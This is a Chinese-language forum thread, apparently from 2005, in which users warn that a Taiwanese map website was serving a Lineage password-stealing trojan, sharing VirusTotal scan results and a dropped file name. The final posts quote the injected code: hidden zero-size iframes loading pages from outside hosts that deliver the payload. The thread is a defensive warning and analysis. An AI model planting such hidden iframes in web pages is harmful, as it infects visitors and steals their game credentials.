【閒聊】電子地圖網有木馬?

darren2000

hxxt://www.map.com.tw

不知道從哪連到大陸假的gamebase.org.cn

然後利用漏洞下載安裝不明程式

而且沒一家掃的出來

已經回報給kav看看了

有去過的小心了

alec5106

這是真的?假的??

mizuiro

通常這類的入侵..都是在種"天堂"的木馬..
剛剛看了一下..卡巴斯基已經可以掃出來了
Trojan-PSW.Win32.Lineage.cb
果然...還是「天堂」木馬....

看樣子大陸仔的駭客靠這個測了不少錢 = =

下面是我把他那個有問題的.chm檔傳去 virustotal 掃的結果...

Antivirus Version Update Result
AntiVir 6.30.0.7 04.01.2005 no virus found
AVG 718 04.01.2005 no virus found
BitDefender 7.0 04.02.2005 no virus found
ClamAV devel-20050307 04.02.2005 no virus found
DrWeb 4.32b 04.02.2005 no virus found
eTrust-Iris 7.1.194.0 04.02.2005 no virus found
eTrust-Vet 11.7.0.0 04.01.2005 no virus found
Fortinet 2.51 04.02.2005 no virus found
F-Prot 3.16a 03.31.2005 no virus found
Ikarus 2.32 04.01.2005 no virus found
Kaspersky 4.0.2.24 04.02.2005 Trojan-PSW.Win32.Lineage.cb
McAfee 4460 04.01.2005 no virus found
NOD32v2 1.1044 04.02.2005 no virus found
Norman 5.70.10 03.31.2005 no virus found
Panda 8.02.00 04.02.2005 no virus found
Sybari 7.5.1314 04.02.2005 no virus found
Symantec 8.0 04.02.2005 no virus found
-------------------------------------------------------------------------
www.virustotal.com :: @ Hispasec Sistemas 2004 :: e-mail [email protected]

darren2000

我把防毒關掉去試試看

發現電腦可疑檔案KAV掃不到

我想應該是病毒

或許可能認錯...

alec5106

果然,
F-secure 也可以掃到
每次出門都會上這個網站參考一下,真要小心一下了

kaspersky

我剛剛把那個 rar 檔傳到 VirusTotal 可是都是顯示 novirus

是不是檔案有問題 ??

darren2000

引用:

作者: kaspersky

我剛剛把那個 rar 檔傳到 VirusTotal 可是都是顯示 novirus

是不是檔案有問題 ??

我後來在進去遇到的是trojanlineage.cb

但是我第一次進去後發現temporary資料夾多出icyfox.exe

似乎檔名跟以前lineage的病毒檔名差不多

而且程序中馬上多出不明程序inertinfo

lineage.cb傳到 VirusTotal也沒幾家可以掃到

這次如果是新變種的話...可能更少可以察覺到了...

我覺的是木馬機會蠻大的...也可能是我太過緊張了

kaspersky

依照您這樣的敘述應該是木馬沒有錯

只是先和您確認您現在放上來的這個檔案是不是就是您第一次傳給 virustotal 以及 kav 的同一個檔案 ?

darren2000

引用:

作者: kaspersky

依照您這樣的敘述應該是木馬沒有錯

只是先和您確認您現在放上來的這個檔案是不是就是您第一次傳給 virustotal 以及 kav 的同一個檔案 ?

嗯嗯沒錯

傳給KAV的裡面其中一個檔案我沒放上來..因為應該是正常的系統檔案

yuping

壓縮檔一直掃不到病毒但是看原始檔應該是這行有問題,Mcafee可以抓到..
<iframe width=0 height=0 src="http://www.xx158.com/tian/icyfox.htm"><iframe src="http://hc898.xm18.china-host.net/2005/" width="0" height="0"></iframe>

darren2000 會員	【閒聊】電子地圖網有木馬? hxxt://www.map.com.tw 不知道從哪連到大陸假的gamebase.org.cn 然後利用漏洞下載安裝不明程式而且沒一家掃的出來已經回報給kav看看了有去過的小心了
	回覆

alec5106 會員	果然, F-secure 也可以掃到每次出門都會上這個網站參考一下,真要小心一下了
	回覆

kaspersky 會員	我剛剛把那個 rar 檔傳到 VirusTotal 可是都是顯示 novirus 是不是檔案有問題 ??
	回覆

yuping 會員	壓縮檔一直掃不到病毒但是看原始檔應該是這行有問題,Mcafee可以抓到.. <iframe width=0 height=0 src="http://www.xx158.com/tian/icyfox.htm"><iframe src="http://hc898.xm18.china-host.net/2005/" width="0" height="0"></iframe>
	回覆